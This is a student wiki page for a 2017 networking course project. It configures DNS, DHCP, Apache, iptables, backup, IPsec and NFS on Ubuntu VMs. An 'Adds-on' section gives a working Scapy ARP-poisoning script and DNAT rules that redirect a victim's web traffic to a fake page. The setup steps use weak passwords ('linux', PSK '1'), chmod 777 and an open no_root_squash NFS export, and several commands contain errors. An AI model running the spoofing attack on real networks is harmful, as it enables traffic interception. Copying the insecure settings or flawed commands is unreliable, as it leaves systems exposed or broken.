Data Networking/Spring 2017/JXM

Motivation

edit

As a network engineer, It's essential to understand and implement network configurations in Linux Operating System. This project aims to design a dynamic network solution using the Domain Name System Server (DNS), Dynamic Host Configuration Protocol Server (DHCP), Web Server, Firewall, Backup Server. The servers and clients will be able to automatically obtain IP addresses by DHCP Server and DNS Server. The clients will be able to get web pages from Web Server. In addition, Firewall and Backup Server will be added to provide a secure and robust network configurations for the company.

Team Members

edit

Junhao Huang

Xinchen Zhang

Mayank Kashyap

Behavior of Protocols

edit

Domain Name System

edit

Domain Name System (DNS) is a hierarchical naming system for computers and services. It translates domain names to numerical IP addresses with different network protocols. A DNS name server stores the DNS records for a domain and replies the answers to its database. There are four most common types of records stored in DNS database:

  1. A and AAAA: IP addresses
  2. NS: Name Server, hostname of the authoritative server
  3. MX: SMTP mail exchangers, transfers electronic mail messages from one computer to anther and translates mail server to the its canonical name
  4. CANME: A Canonical Name Record is used to translate a domain name to the canonical domain.
  5. PTR: IP address to hostname translation

Dynamic Host Configuration Protocol

edit

Dynamic Host Configuration Protocol (DHCP) is a client/server protocol that automatically provides an Internet Protocol (IP) host with its IP address and other related configuration information such as the subnet mask and default gateway. RFCs 2131 and 2132 define DHCP as an Internet Engineering Task Force (IETF) standard based on Bootstrap Protocol (BOOTP), a protocol with which DHCP shares many implementation details. DHCP allows hosts to obtain required TCP/IP configuration information from a DHCP server.

Why is DHCP required?

Every device on a TCP/IP-based network must have a unique unicast IP address to access the network and its resources. Without DHCP, IP addresses for new computers or computers that are moved from one subnet to another must be configured manually; IP addresses for computers that are removed from the network must be manually reclaimed. With DHCP, this entire process is automated and managed centrally. The DHCP server maintains a pool of IP addresses and leases an address to any DHCP-enabled client when it starts up on the network. Because the IP addresses are dynamic (leased) rather than static (permanently assigned), addresses no longer in use are automatically returned to the pool for reallocation. The network administrator establishes DHCP servers that maintain TCP/IP configuration information and provide address configuration to DHCP-enabled clients in the form of a lease offer. The DHCP server stores the configuration information in a database that includes: Valid TCP/IP configuration parameters for all clients on the network.

Valid IP addresses, maintained in a pool for assignment to clients, as well as excluded addresses.

Reserved IP addresses associated with particular DHCP clients. This allows consistent assignment of a single IP address to a single DHCP client.

The lease duration, or the length of time for which the IP address can be used before a lease renewal is required.

A DHCP-enabled client, upon accepting a lease offer, receives: A valid IP address for the subnet to which it is connecting.

Requested DHCP options, which are additional parameters that a DHCP server is configured to assign to clients. Some examples of DHCP options are Router (default gateway), DNS Servers, and DNS Domain Name. For a full list of DHCP options, see DHCP Tools and Options.

2601:197:800:2EFA:B827:C938:5A64:EDBE (discuss) 02:52, 7 April 2017 (UTC)[1]

Webserver

edit

Storing, processing and delivering webpages to clients is the basic function of a web server, which means that web servers host webpages to clients.

Apache2 is quite popular among people who would like to make a web server in Linux. phpmyadmin is good for configuring a web server.

Firewall

edit

Firewall is a kind of computer system which is used to protect the network from internet attack. It is a barrier to between a internal network and other outside network.

By setting some rules to the server we can accept all the service we want and block others to make our internal network safe from the potential dangers from the Internet.

Backup

edit

In case of the damage of the web server, a backup server is used to store the file and data on a network. So that the file and data would not be missed after the web server gets some error.

Requirements

edit
  • Configure a DNS server to resolve domain names and reverse domains
  • Configure a DHCP server to assign IPv4 and IPv6 addresses dynamically
  • Implement a web server to host a web page
  • Implement a backup server to automatically install the server files using SSH and a NFS server
  • Create a firewall to provide the security

Steps and Commands

edit

Master DNS

Step1: Install the BIND9 DNS server:

        sudo apt-get install bind9

Step2: Change hostname and host files:

        sudo nano /etc/hostname
        ubuntu
        sudo nano /etc/hosts
        127.0.0.1     localhost
        192.168.10.2  ubuntu.jjxm.com ubuntu

Step3: Edit the name servers:

        sudo nano /etc/resolvconf/resolv.conf.d/head
        nameserver 192.168.10.2
        nameserver 192.168.10.3
        search jjxm.com

Step4: Edit the forwarders:

        sudo nano /etc/bind/named.conf.options
        forwarders {
                192.168.10.1;
                192.168.10.2;
                192.168.10.3;
        };

Step5: Edit forward and reverse zones:

             #Forward IPV4 Zone 
             zone "jjxm.com" {
             type master;				
             file "/etc/bind/db.jjxm.com";                                                                                          
             allow-transfer { 192.168.10.3; };       
             also-notify { 192.168.10.3; };
             };               
             #Reverse Zone 
             zone "10.168.192.in-addr.arpa" {                                                                                                
             type master; 
             file "/etc/bind/db.192";allow-transfer { 192.168.10.3; };                                                                                               
             allow-transfer { 192.168.10.3; };
             }; 
              #Reverse IPv6 zone
              zone "0.0.0.0.0.0.0.0.0.0.0.0.8.8.1.1.ip6.arpa"{
              type master;
              file "/etc/bind/db.2001";
              }

Step6: Create the zone files:

        sudo nano /etc/bind/db.jjxm.com
        
               ; BIND data file for jjxm.com
               ;
               $TTL    604800
               @       IN      SOA     jjxm.com.     root.jjxm.com.        (
                                             6         ; Serial
                                        604800         ; Refresh
                                         86400         ; Retry
                                       2419200         ; Expire
                                        604800 )       ; Negative Cache TTL
               ;
               @       IN      NS      ubuntu.jjxm.com.
               @       IN      A       192.168.10.2
               @       IN      AAAA    1188::2222
               ubuntu  IN      A       192.168.10.2
               ubuntu  IN      AAAA    1188::2222
               www     IN      A       192.168.10.7
               www     IN      AAAA    1199::3333
               a       IN      CNAME   www
               b       IN      CNAME   www
               c       IN      CNAME   www
               d       IN      CNAME   www


        sudo nano /etc/bind/db.192
        
            ; BIND reverse data file for 192
            ;
            $TTL    604800
            @       IN      SOA     ubuntu.jjxm.com. root.jjxm.com. (
                                        8         ; Serial
                                    604800         ; Refresh
                                    86400         ; Retry
                                    2419200         ; Expire
                                    604800 )       ; Negative Cache TTL

            @       IN      NS      ubuntu.jjxm.com.
            2     IN      PTR     ubuntu.jjxm.com.
            1       IN      PTR     www.jjxm.com.
            1       IN      PTR     a.jjxm.com.
            1       IN      PTR     b.jjxm.com.
            1       IN      PTR     c.jjxm.com.
            1       IN      PTR     d.jjxm.com.


        sudo nano /etc/bind/db.2001
        
            ; BIND reverse data file for 2001
            ;
            $TTL    604800
            @       IN      SOA     ubuntu.jjxm.com.  root.jjxm.com. (
                                        4         ; Serial
                                    604800         ; Refresh
                                    86400         ; Retry
                                    2419200         ; Expire
                                    604800 )       ; Negative Cache TTL
            ;
            @       IN      NS      ubuntu.jjxm.com.
            @       IN      NS      ubuntu.jjxm.com.

            1.1.1.1.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   ubuntu.jjxm.com.
            2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   www.jjxm.com.
            2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   a.jjxm.com.
            2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   b.jjxm.com.
            2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   c.jjxm.com.
            2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   d.jjxm.com.

Step7: Restart the bind9

        sudo nano /etc/init.d/bind9 restart

Slave DNS

Step1: Edit forward and reverse zones:

             #Forward IPV4 Zone 
             zone "jjxm.com" {
             type slave;				
             file "/etc/bind/db.jjxm.com";                                                                                          
             allow-transfer { 192.168.10.2; };       
             };               
             #Reverse Zone 
             zone "10.168.192.in-addr.arpa" {                                                                                                
             type slave; 
             file "/etc/bind/db.192";
             allow-transfer { 192.168.10.2; };                                                                                               
             }; 
              #Reverse IPv6 zone
              zone "0.0.0.0.0.0.0.0.0.0.0.0.8.8.1.1.ip6.arpa"{
              type slave;
              file "/etc/bind/db.2001";
              }

Step2: Restart the bind9

        sudo nano /etc/init.d/bind9 restart

DHCP

edit

To install DHCP server, open a new Ubuntu VM to serve as DHCP server for your network. Once configured, this server cannot access internet anymore because of changes in the domain name and name servers. We will be using ISC (Internet Systems Consortium) DHCP server in our project and below are the steps for installation:

Step 1: Install ISC's dhcp server in terminal:

sudo apt-get isc-dhcp-server

Step 2: Indicate the network interface "ens33" in the isc-dhcp-server file located in /etc/default/ and also enable IPv6 through editing "OPTIONS=-6"

sudo nano /etc/default/isc-dhcp-server

#Inside the file, edit the following:
OPTIONS="-6"

INTERFACES="ens33"

Step 3: Make edits and changes to the DHCP configuration file for IPv4

#Comment the option domain-name and option domain-name servers as we'll define them later 

#Uncomment authoritative

authoritative;

subnet 192.168.10.0 netmask 255.255.255.0 {
  range 192.168.10.20 192.168.10.100;
  option domain-name-servers 192.168.10.2, 192.168.10.3;
  option domain-name "jjxm.com";
  option routers 192.168.10.1;
  option broadcast-address 192.168.10.255;
  default-lease-time 21600;
  max-lease-time 43200;
}

host Webserver {
  hardware ethernet 00:0c:29:f5:9c:e8;
  fixed-address 192.168.10.7;
}

host MainDns {
  hardware ethernet 00:0c:29:45:fc:50;
  fixed-address 192.168.10.2;
}

host SlaveDns {
  hardware ethernet 00:0c:29:47:f3:29;
  fixed-address 192.168.10.3;
}
host Backup {
  hardware ethernet 00:0c:29:60:9f:da;
  fixed-address 192.168.10.10;
}

Step 4: Make changes to the virtual machine's interfaces by changing the interfaces file in /etc/network/

sudo nano /etc/network/interfaces

#Write the following

auto lo
iface lo inet loopback

auto ens33
iface ens33 inet static
 address 192.168.10.6
 netmask 255.255.255.0
 gateway 192.168.10.1
 network 192.168.10.0
 broadcast 192.168.1.255
 dns-domain-nameserver 192.168.10.2 192.168.10.3
 dns-domain-search jjxm.com

iface ens33 inet6 static
 address 2001:0db8:20ad:f103::6
 netmask 64

Step 5: Edit the resolve file

sudo /etc/resolv.conf

#following edits in this file



nameserver 192.168.10.2 
#its the main dns server

Step 6: Enable IPv4 and IPv6 forwarding

sudo nano /etc/sysctl.conf:

#in this file, uncomment these:

 net.ipv4.conf.default.rp_filter=1
    net.ipv4.ip_forward=1
    net.ipv6.conf.all.forwarding=1

Step 7: Install radvd for IPv6 advertising using the following command

sudo apt-get install radvd

Step 8: Configure dhcpd6.conf to add IPv6 address pool

sudo nano /etc/dhcp/dhcpd6.conf

#Make the following changes in this file


ddns-update-style none;

authoritative;

allow leasequery;

dhcpv6-lease-file-name "var/lib/dhcp/dhcpd6.leases";
log-facility local7;

subnet6 2001:0db8:20ad:f103::/64 {
 range6 2001:0db8:20ad:f103::20 2001:0db8:20ad:f103::100;
 option dhcp6.name-servers 2001:0db8:f103::2,
 2001:0db8:f103::3;
 option domain-name "jxm.com";
 defaut-lease-time 21600;
 max-lifetime 43200;
 host Webserver {
 hardware ethernet 00:0c:29:f5:9c:e8;
 fixed-address 2001:0db8:20ad:f103::7;
 }

host MainDns {
 hardware ethernet 00:0c:29:45:fc:50;
 fixed-address 2001:0db8:20ad:f103::2;
 }
host SlaveDns {
 hardware ethernet 00:0c:29:47:f3:29;
 fixed-address 2001:0db8:20ad:f103::3;
 }

host Backup {
 hardware ethernet 00:0c:29:60:9f:da;
 fixed-address 2001:0db8:20ad:f103::10;
 }

}

Step 9: Edit radvd configuration file

sudo nano /etc/radvd.conf 

#in this file, write the following:

interface ens33 {
 AdvSendAdvert on;
 AdvOtherConfigFlag off;

 prefix 2001:0db8:20ad:f103::/64 {
 AdvOnLink on;
 AdvAutonomous on;
 AdvRouterAddr on;
    };
 );

Step 10: Restart the network interface (NOTE: THIS WILL DISABLE YOUR INTERNET CONNECTION IN THE VM)

sudo /etc/init.d/networking restart

Step 11: Start the DHCP server for IPv4 and IPv6

sudo service isc-dhcp-server start
sudo service isc-dhcp-server6 start

Web server

edit

Step 1: We need to use Apache to as our web server, so we install Apache first Command:

              sudo apt-get update 
              sudo apt-get install apache2    
          

Step 2: Install PHP Command:

              sudo apt-get install php      


Step 3: Install MySQL, and set the password as“linux” Command:

              sudo apt-get install mysql-server        


Step 4: Check if mysql is working Command:

              sudo netstat -tap | grep mysql 
              tcp        0      0 localhost:mysql         *:*                     LISTEN      841/mysqld
        


Step 5: Install phpmyadmin, choose apache when installing, and also set the password as "linux" Command:

              sudo apt-get install phpmyadmin      

Step 6: To create the phpmyadmin like we have to use chmod command to change the authority of /var/www Command:

              sudo chmod 777 /var/www      

Step 7: Create the phpmyadmin link between /usr/share/phpmyadmin and /var/www/html, after that we can see there is a phpmyadmin file in /var/www/html Command:

              sudo ln -s /usr/share/phpmyadmin /var/www/html       


Step 8: Create a basic webpage “Index.htm”, and we can see a index.html file in /var/www/html

Step 9: Go into the configuration of apache2 and change the default webpage catalog “/var/www” to “/home/ttno1”, and there is no '/' after directory path Command:

              sudo vi /etc/apache2/apache2.conf


Step 10: Go into the configuration of 000-default and change the default webpage catalog “/var/www/html” to “/home/ttno1” Command:

              sudo vi /etc/apache2/sites-available/000-default.conf


Step 11: We need to restart the apache Command:

              sudo /etc/init.d/apache2 restart  


Step 11: Use the browser on another host to visit the web server with its IP address.

Firewall[2]

edit

Step 1: List the current rules in iptables, and if you never set up your server before, you should see:

Chain INPUT (policy ACCEPT)

target prot opt source destination

Chain FORWARD (policy ACCEPT)

target prot opt source destination

Chain OUTPUT (policy ACCEPT)

target prot opt source destination

Command:

               sudo iptables –L

Step 2: To allow established sessions to get traffic

Command:

               sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

And if the command above does not work, try the following one:

sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPTED

Step 3: Set up SSH, HTTP, FTP, TFTP, DHCP, DNS, VPN

Command:

               sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
               sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT
               sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 546 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 547 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT
               sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
               sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
               sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT
               sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT
               sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
               sudo iptables -A OUTPUT  -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT


Step 4: To send network packets to let computers' serveics cummunicate with each other.

Command:

               sudo iptables -I INPUT 1 -i lo -j ACCEPT


Step 5: Accept all traffic on loopback interface

Command:

               sudo iptables -A INPUT -i lo -j ACCEPT
               sudo iptables -A OUTPUT -o lo -j ACCEPT


Step 6: To establish outgoing connections

Command:

               sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT


Step 7: Set up from internal to external

Command:

               sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT


Step 8: To drop Invalid Packets

Command:

               sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP


Step 9: The function of deny ping

Command:

               sudo iptables –A INPUT –p icmp --icmp-type echo-request –j REJECT


Step 10: For each client we set up a 10 connection limit for them

Command:

               sudo iptables -A INPUT -p tcp –-dport 22 –m connlimit –-connlimit-above 10 –j REJECT


Step 11: To prevent HTTP flood

Command:

               sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT


Step 12: If there is a need of block an IP Address

Command:

               sudo iptables -I INPUT -s 192.168.10.134 -j DROP


Step 13: If you would like to cancel the block IP address

Command:

               sudo iptables -D INPUT -s 192.168.10.134 -j DROP


Step 14: Make permittion for VPN

Command:

               Sudo iptables –A INPUT –p udp --dport 500 –j ACCEPT
               Sudo iptables –A INPUT –p udp --dport 4500 –j ACCEPT
               Sudo iptables –A INPUT –p esp –j ACCEPT


Step 15: Deny other settings

Command:

               sudo iptables –A INPUT –j DROP


Step 16: To preserve your IPTABLES rules upon reboot, install iptables-persistant

Command:

               sudo apt-get install iptables-persistent


Step 17: Once the rules are changed, run the following commands to save and reload them before and after reboot

Command:

               sudo netfilter-persistent save
               sudo netfilter-persistent reload

Backup

edit

Step1: We use rsync to set up backup server.

 sudo apt-get install rsync

Step 2: Then we install SSH on web server and backup server.

sudo apt-get install ssh

Step3: Generate a rsa key

ssh-keygen -t rsa

Step4: We generate the keys to another host.

ssh-copy-id b@192.168.10.10

Step5: Create a backup zip file on the master server:

sudo crontab -e

Step6: The files are zipped and compressed:

21 20 * * * sudo zip -r /home/b/backup -j /home/b/jjxm

Step7: The zip is transferred to the backup server

sudo crontab -e

Step8: Unzip the original files

40 20 * * * sudo unzip -o /home/b/Backup -d /home/b/jjxm

Testing Procedure

edit

Step1: Use "nslookup" command to lookup the DNS server for different hostnames.

Step2: Use "dig" command to check the DNS records and zone files.

Step3: Turn the master DNS off and check nslookup.

DHCP

edit

Step 1: Use the following command to check the status of dhcp server

sudo service isc-dhcp-server status

#It should show the following output:

 isc-dhcp-server.service - ISC DHCP IPv4 server
   Loaded: loaded (/lib/systemd/system/isc-dhcp-server.service; enabled; vendor 
   Active: active (running) since Fri 2017-04-14 19:04:35 PDT; 1h 33min ago
     Docs: man:dhcpd(8)
 Main PID: 1184 (dhcpd)
   CGroup: /system.slice/isc-dhcp-server.service
           └─1184 dhcpd -user dhcpd -group dhcpd -f -4 -pf /var/run/dhcp-server/


#The same is to be followed for IPv6 dhcp with the following command

sudo service isc-dhcp-server6 status

Step 2: To check if DHCP is leasing out addresses and other updates like acknowledgments and requests, use the following command after connecting DHCP to client. The red text represents the errors.

journalctl -xe

Step 3: Check output at client's and other hosts' end. If the hosts receive the addresses that were specified as static addresses by DHCP and if client receives an address in the range defined by DHCP, then our test procedure is successful.

Web Server

edit

Step1: Turn on your web server.

Step2: Open a browser on a client and enter the IP address of the web server to check if we can get access to the webpage of the server.

Firewall

edit

Method 1

edit

Ping client's IP address in the terminal of web server's ubuntu and it successes.

Ping web server's IP address in the terminal of client and it shows destination port unreachable.

Method 2

edit

Step 1: Open a browser and enter the IP address of the web server in a client.

Step 2: Block the IP address of the client by adding a IPtable on the terminal of the web server.

Step 3: Refresh the webpage in the client side. And see if the webpage can be refreshed.

Step 4: Delete the IPtable to allow the client get access to web server.

Step 5: Try again to refresh the webpage in the client side.

Backup

edit

Check the files after the set time in crontab.

Integrated Testing

Adds-on

edit

Step 1: We use scapy[3] and python to make our ARP Poinsoning, so we install scapy first. Command:

              sudo apt-get install tcpdump python3-crypto ipython3
              sudo apt install python-scapy
              sudo apt install sysv-rc-conf

Step 2: To be the superuser and get higher authority, we reset the root password. Command:

              sudo passwd root 

Step 3: Start iptables after reboot Command:

              sudo sysv-rc-conf --level 2345 iptables on

Step 4: Turn on IP forwarding Command:

              sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

Step 5: Configure Scapy arp poison Command:

              scapy
              op=2
              victim= '192.168.10.28' 
              spoof= '192.168.10.1'         
              mac='00:0c:29:73:56:67' 
              arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
              send(arp)
              op =1
              arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
              send(arp)
              send(arp,inter=2,count=1000)      

Step 6: Make a fake web page Command:

              /etc/init.d/apache2 start
              echo “HAHA U LOSE.” > /home/Mayank/index.htm

Step 7: Forward the traffic Command:

              iptables -t nat --flush
              iptables --zero
              iptables -A FORWARD --in-interface ens33 -j ACCEPT
              iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE
              iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 192.168.10.30

IPSec

edit

IPSec can be configured in any two virtual machines. In our case, we are configuring IPSec between two Ubuntu VMs with IP addresses: 192.168.10.21 and 192.168.10.25.

Step 1: Install ipsec in the first host using the following command

sudo apt-get ipsec-tools strongswan-starter

Step 2: Go to the ipsec.conf file at /etc/ to update the parameters

#on both hosts, type this command:

sudo nano /etc/ipsec.conf

#Host 1

conn host1-to-host2
       authby=secret
       auto=route
       keyexchange=ike
       left=192.168.10.21 
       right=192.168.10.25
       type=transport
       esp=aes128gcm16!
       
#Host 2

conn host2-to-host1
       authby=secret
       auto=route
       keyexchange=ike
       left=192.168.10.25
       right=192.168.10.21
       type=transport
       esp=aes128gcm16!

Step 3: Configure the secrets file in both hosts

#on both hosts

sudo nano /etc/ipsec.secrets

#host 1

192.168.10.21 192.168.10.25 : PSK "1"

#host 2

192.168.10.25 192.168.10.21 : PSK "1"

Step 4: Use this command to restart the ipsec processes

sudo ipsec restart

Step 5: Check the ipsec status

sudo ipsec statusall

#Obtain an output like this:


#Status of IKE charon daemon (strongSwan 5.3.5, Linux 4.4.0-31-generic, x86_64):
#  uptime: 7 seconds, since Apr 14 21:02:45 2017
#  malloc: sbrk 1351680, mmap 0, used 327664, free 1024016
#  worker threads: 11 of 16 idle, 5/0/0/0 working, job queue: 0/0/0/0, scheduled: 0
#  loaded plugins: charon test-vectors aes rc2 sha1 sha2 md4 md5 random nonce x509 revocation constraints pubkey pkcs1 pkcs7 pkcs8 pkcs12 pgp dnskey sshkey pem openssl fips-prf gmp agent xcbc hmac gcm attr kernel-netlink resolve socket-default connmark stroke updown
#Listening IP addresses:
#Connections:
#host1-to-host2:  192.168.10.21...192.168.10.25  IKEv1/2
#host1-to-host2:   local:  [192.168.10.21] uses pre-shared key authentication
#host1-to-host2:   remote: [192.168.10.25] uses pre-shared key authentication
#host1-to-host2:   child:  dynamic === dynamic TRANSPORT
#Routed Connections:
#host1-to-host2{1}:  ROUTED, TRANSPORT, reqid 1
#host1-to-host2{1}:   192.168.10.21/32 === 192.168.10.25/32
#Security Associations (0 up, 0 connecting):
#  none

NFS-Server

Step 1: Inatall nfs-kernel-server Command:

              sudo apt-get install nfs-kernel-server
              sudo apt-get install rpcbind

Step 2: Make share folder Command:

              sudo mkdir /home/mayank/Desktop/nfs

Step 3: Edit configuration Command:

              sudo vim /etc/exports
              /home/mayank/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)

Step 4: Restart service Command:

              sudo service rpcbind restart restart
              sudo service restart nfs-kernel-server restart

Step 5: Test Command:

              showmount -e
        
              Export list for ubuntu:
              /home/mayank/Desktop/nfs *

NFS-Clients

Step 1: Inatall nfs-common for clients Command:

              sudo apt-get install nfs-common
              sudo apt-get install rpcbind

Step 2: Make share folder Command:

              mkdir /home/client1/Desktop/nfs

Step 3: Mount the share file Command:

              sudo mount -t nfs 192.168.10.2:/home/nfs/Desktop/nfs /home/client1/Desktop/nfs

Step 4: Mount this share file when turn on the client Command:

              sudo vim /etc/rc.local
              sudo mount -t nfs 192.168.10.2:/home/nfs/Desktop/nfs /home/client1/Desktop/nfs

Reference

edit
  1. https://technet.microsoft.com/en-us/library/dd145320(v=ws.10).aspx
  2. 9
  3. 8

2. https://help.ubuntu.com/community/BIND9ServerHowto

3. http://www.webopedia.com/TERM/B/backup_server.html

4. https://en.wikipedia.org/wiki/Domain_Name_System

5. https://askubuntu.com

6. https://wiki.strongswan.org

7. https://www.cisco.com

8. http://www.aviran.org/arp-poisoning-python-scapy/

9. https://help.ubuntu.com/community/IptablesHowTo